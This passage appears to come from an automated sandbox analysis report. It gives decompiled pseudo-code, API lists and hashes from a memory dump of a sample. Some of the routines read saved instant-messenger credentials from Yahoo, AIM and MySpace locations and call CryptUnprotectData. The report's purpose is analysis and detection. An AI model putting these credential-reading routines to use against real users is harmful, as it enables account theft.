                                          				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                          			}

                                          APIs
                                          • GetDC.USER32(00000000), ref: 00406CB5
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
                                          • GetWindowRect.USER32(?,?), ref: 00406CE2
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,745D3BB0), ref: 00406D20
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CapsDeviceWindow$MoveRectRelease
                                          • String ID:
                                          • API String ID: 3197862061-0
                                          • Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                          • Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
                                          • Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                          • Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00403D24(void* _a4, char* _a8) {
                                          				long _v8;
                                          				void _v8199;
                                          				char _v8200;
                                          				void _v24582;
                                          				short _v24584;
                                          
                                          				0x414060();
                                          				_v24584 = 0;
                                          				memset( &_v24582, 0, 0x3ffe);
                                          				_v8200 = 0;
                                          				memset( &_v8199, 0, 0x1fff);
                                          				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                          				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                          				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 00403D49
                                          • memset.MSVCRT ref: 00403D62
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
                                          • strlen.MSVCRT ref: 00403DAA
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                          • String ID:
                                          • API String ID: 1786725549-0
                                          • Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                          • Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
                                          • Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                          • Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          • _strcmpi.MSVCRT ref: 0040F3D1
                                          • _strcmpi.MSVCRT ref: 0040F3F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$memcpystrlen
                                          • String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
                                          • API String ID: 2025310588-2353251349
                                          • Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                          • Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
                                          • Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                          • Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                          • Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
                                          • Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                          • Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00413B3E
                                          • memset.MSVCRT ref: 00413B57
                                          • memset.MSVCRT ref: 00413B6B
                                            • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                          • strlen.MSVCRT ref: 00413B87
                                          • memcpy.MSVCRT ref: 00413BAC
                                          • memcpy.MSVCRT ref: 00413BC2
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                            • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                          • memcpy.MSVCRT ref: 00413C02
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                            • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                            • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen
                                          • String ID:
                                          • API String ID: 2142929671-0
                                          • Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                          • Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
                                          • Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                          • Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          • strtoul.MSVCRT ref: 00402782
                                          • _mbscpy.MSVCRT ref: 00402807
                                          • _mbscpy.MSVCRT ref: 00402817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$QueryValuestrtoul
                                          • String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
                                          • API String ID: 4008679483-1446091703
                                          • Opcode ID: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                          • Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
                                          • Opcode Fuzzy Hash: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                          • Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0040B2F5(void* __eax) {
                                          				void* __esi;
                                          				_Unknown_base(*)()* _t30;
                                          				void* _t35;
                                          				intOrPtr _t38;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				char* _t51;
                                          				int _t58;
                                          
                                          				_t40 = __eax;
                                          				memcpy( *((intOrPtr*)(__eax + 0x390)) + 0x1d4,  *(__eax + 0x38c), 0x1c8 << 2);
                                          				asm("movsw");
                                          				asm("movsb");
                                          				_t44 =  *((intOrPtr*)(_t40 + 0x398));
                                          				_t58 = 0;
                                          				if( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)) > 0) {
                                          					do {
                                          						_t35 = E0040779F(_t58, _t44);
                                          						0x413d74("/sort", _t35);
                                          						if(_t35 == 0) {
                                          							_t7 = _t58 + 1; // 0x1
                                          							_t51 = E0040779F(_t7,  *((intOrPtr*)(_t40 + 0x398)));
                                          							_t66 =  *_t51 - 0x7e;
                                          							_t38 =  *((intOrPtr*)(_t40 + 0x390));
                                          							if( *_t51 != 0x7e) {
                                          								_push(0);
                                          							} else {
                                          								_push(1);
                                          								_t51 = _t51 + 1;
                                          							}
                                          							_push(_t51);
                                          							E0040AE7D(_t38, _t66);
                                          						}
                                          						_t44 =  *((intOrPtr*)(_t40 + 0x398));
                                          						_t58 = _t58 + 1;
                                          					} while (_t58 <  *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)));
                                          				}
                                          				E0040671B();
                                          				 *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)) + 0x28)) = 0;
                                          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)))) + 0x5c))();
                                          				if(E004077AF( *((intOrPtr*)(_t40 + 0x398)), ?str?, 0xffffffff) == 0xffffffff) {
                                          					_t41 =  *((intOrPtr*)(_t40 + 0x390));
                                          					if( *0x41e394 == 0) {
                                          						 *0x41e398 =  *((intOrPtr*)(_t41 + 0x1ac));
                                          						 *0x41e394 = 1;
                                          					}
                                          					_t30 =  *((intOrPtr*)( *_t41 + 0x60))(E0040AE57);
                                          					qsort( *((intOrPtr*)( *_t41 + 0x64))(), 0,  *(_t41 + 0x28), _t30);
                                          				}
                                          				return SetCursor( *0x41dbd8);
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor_mbsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 882979914-1578091866
                                          • Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                          • Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
                                          • Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                          • Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00413757
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          • RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpenQueryValuememset
                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                          • API String ID: 1830152886-1703613266
                                          • Opcode ID: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                          • Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
                                          • Opcode Fuzzy Hash: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                          • Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SHGetMalloc.SHELL32(?), ref: 004123A6
                                          • SHBrowseForFolder.SHELL32(?), ref: 004123D8
                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
                                          • _mbscpy.MSVCRT ref: 004123FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                          • String ID: [@
                                          • API String ID: 1479990042-3416412563
                                          • Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                          • Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
                                          • Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                          • Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00408C31(CHAR* _a4, intOrPtr _a8) {
                                          				void _v4103;
                                          				char _v4104;
                                          
                                          				0x414060();
                                          				_v4104 = 0;
                                          				memset( &_v4103, 0, 0x1000);
                                          				GetPrivateProfileStringA(0x41e308, _a4, 0x417c88,  &_v4104, 0x1000, 0x41e200);
                                          				if(_v4104 == 0) {
                                          					return 0;
                                          				} else {
                                          					0x413d0c(_a8,  &_v4104);
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 00408C55
                                          • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                          • _mbscpy.MSVCRT ref: 00408C91
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
                                          • ?@, xrefs: 00408C31
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString_mbscpymemset
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
                                          • API String ID: 408644273-2377969721
                                          • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                          • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
                                          • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                          • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00406830(long __eax, struct HWND__* _a4) {
                                          				char _v1028;
                                          				char _v2052;
                                          				void* __edi;
                                          				long _t15;
                                          
                                          				_t15 = __eax;
                                          				if(__eax == 0) {
                                          					_t15 = GetLastError();
                                          				}
                                          				E00406735(_t15,  &_v1028);
                                          				_push( &_v1028);
                                          				_push(_t15);
                                          				sprintf( &_v2052, "Error %d: %s");
                                          				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
                                          			}








                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLastMessagesprintf
                                          • String ID: Error$Error %d: %s
                                          • API String ID: 1670431679-1552265934
                                          • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                          • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
                                          • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                          • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memset.MSVCRT ref: 00410939
                                          • memset.MSVCRT ref: 0041097A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$AddressLibraryLoadProc
                                          • String ID:
                                          • API String ID: 95357979-0
                                          • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                          • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
                                          • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                          • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E0040C929(signed int __eax, void* __ecx, void* _a4) {
                                          				unsigned int _t23;
                                          				signed int _t25;
                                          				unsigned int _t34;
                                          				unsigned int _t36;
                                          				void* _t40;
                                          				unsigned int _t45;
                                          				void* _t46;
                                          				int _t47;
                                          				void* _t48;
                                          				void* _t50;
                                          
                                          				_t48 = __ecx;
                                          				_t34 = __eax;
                                          				_t23 =  *(__ecx + 0x10);
                                          				_t36 = _t23 + __eax * 8;
                                          				 *(__ecx + 0x10) = _t36;
                                          				if(_t36 < _t23) {
                                          					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                          				}
                                          				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                          				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                          				if(_t25 == 0) {
                                          					L6:
                                          					if(_t34 >= 0x40) {
                                          						_t45 = _t34 >> 6;
                                          						do {
                                          							memcpy(_t48 + 0x18, _a4, 0x40);
                                          							_t50 = _t50 + 0xc;
                                          							E0040CA46(_t48 + 0x18, _t48);
                                          							_a4 = _a4 + 0x40;
                                          							_t34 = _t34 - 0x40;
                                          							_t45 = _t45 - 1;
                                          						} while (_t45 != 0);
                                          					}
                                          					_push(_t34);
                                          					_push(_a4);
                                          					_push(_t48 + 0x18);
                                          				} else {
                                          					_t46 = 0x40;
                                          					_t47 = _t46 - _t25;
                                          					_t40 = _t48 + 0x18 + _t25;
                                          					if(_t34 >= _t47) {
                                          						memcpy(_t40, _a4, _t47);
                                          						_t50 = _t50 + 0xc;
                                          						E0040CA46(_t48 + 0x18, _t48);
                                          						_a4 = _a4 + _t47;
                                          						_t34 = _t34 - _t47;
                                          						goto L6;
                                          					} else {
                                          						_push(_t34);
                                          						_push(_a4);
                                          						_push(_t40);
                                          					}
                                          				}
                                          				return memcpy();
                                          			}














                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @$@
                                          • API String ID: 3510742995-149943524
                                          • Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                          • Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
                                          • Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                          • Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetstrlen$_mbscat_mbscpy
                                          • String ID: MySpace\IM\users.txt
                                          • API String ID: 779718277-1720829597
                                          • Opcode ID: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                          • Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
                                          • Opcode Fuzzy Hash: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                          • Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E0040A455(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                          				void _v259;
                                          				char _v260;
                                          				char* _t30;
                                          				signed int _t33;
                                          				char* _t44;
                                          				void* _t46;
                                          
                                          				E004067EC(_a4, "<item>");
                                          				_t33 = 0;
                                          				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
                                          					do {
                                          						_v260 = 0;
                                          						memset( &_v259, 0, 0xfe);
                                          						 *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4),  *((intOrPtr*)(__edi + 0x4c)));
                                          						0x41244b();
                                          						_t44 =  &_v260;
                                          						E00409DD6(_t44,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
                                          						_t30 = _t44;
                                          						_push(_t30);
                                          						_push( *((intOrPtr*)(__edi + 0x50)));
                                          						_push(_t30);
                                          						sprintf( *(__edi + 0x54), "<%s>%s</%s>");
                                          						E004067EC(_a4,  *(__edi + 0x54));
                                          						_t46 = _t46 + 0x28;
                                          						_t33 = _t33 + 1;
                                          					} while (_t33 <  *((intOrPtr*)(__edi + 0x20)));
                                          				}
                                          				return E004067EC(_a4, "</item>");
                                          			}










                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • memset.MSVCRT ref: 0040A48B
                                            • Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9
                                            • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                            • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                          • sprintf.MSVCRT ref: 0040A4D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                          • String ID: <%s>%s</%s>$</item>$<item>
                                          • API String ID: 3337535707-2769808009
                                          • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                          • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
                                          • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                          • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E0040B1EC(void* __ebx) {
                                          				void* __esi;
                                          				void* _t18;
                                          				void* _t37;
                                          
                                          				_t37 = __ebx;
                                          				_t18 = E00401033();
                                          				if(_t18 == 0x37e9) {
                                          					memcpy( *((intOrPtr*)(__ebx + 0x390)) + 0x1d4,  *(__ebx + 0x38c), 0x1c8 << 2);
                                          					asm("movsw");
                                          					asm("movsb");
                                          					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0xb, 0, 0);
                                          					E0040671B();
                                          					 *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)) + 0x28)) = 0;
                                          					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0x1009, 0, 0);
                                          					if(E004028E7() == 0) {
                                          						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)))) + 0x5c))();
                                          					}
                                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x390)))) + 0x74))(1);
                                          					E0040B15B(_t37);
                                          					SetCursor( *0x41dbd8);
                                          					SetFocus( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184));
                                          					return SendMessageA( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184), 0xb, 1, 0);
                                          				}
                                          				return _t18;
                                          			}







                                          APIs
                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233
                                            • Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
                                            • Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729
                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256
                                            • Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
                                            • Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
                                            • Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934
                                          • SetCursor.USER32(?,?,0040C35B), ref: 0040B286
                                          • SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 1022157474-0
                                          • Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                          • Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
                                          • Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                          • Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00408A69(void* __esi, struct HWND__* _a4, signed int _a8) {
                                          				intOrPtr _v12;
                                          				struct tagPOINT _v20;
                                          				struct tagRECT _v36;
                                          				int _t27;
                                          				struct HWND__* _t30;
                                          				struct HWND__* _t32;
                                          
                                          				_t30 = _a4;
                                          				if((_a8 & 0x00000001) != 0) {
                                          					_t32 = GetParent(_t30);
                                          					GetWindowRect(_t30,  &_v20);
                                          					GetClientRect(_t32,  &_v36);
                                          					MapWindowPoints(0, _t32,  &_v20, 2);
                                          					_t27 = _v36.right - _v12 - _v36.left;
                                          					_v20.x = _t27;
                                          					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                          				}
                                          				if((_a8 & 0x00000002) != 0) {
                                          					E00406DA8(_t30);
                                          				}
                                          				return 1;
                                          			}










                                          APIs
                                          • GetParent.USER32(?), ref: 00408A7B
                                          • GetWindowRect.USER32(?,?), ref: 00408A88
                                          • GetClientRect.USER32(00000000,?), ref: 00408A93
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          • Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                          • Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
                                          • Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                          • Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E0040A627(intOrPtr* __ecx, intOrPtr _a4) {
                                          				void _v259;
                                          				char _v260;
                                          				void _v515;
                                          				char _v516;
                                          				void* __esi;
                                          				void* _t17;
                                          				intOrPtr* _t26;
                                          				char* _t28;
                                          
                                          				_t26 = __ecx;
                                          				_v260 = 0;
                                          				memset( &_v259, 0, 0xfe);
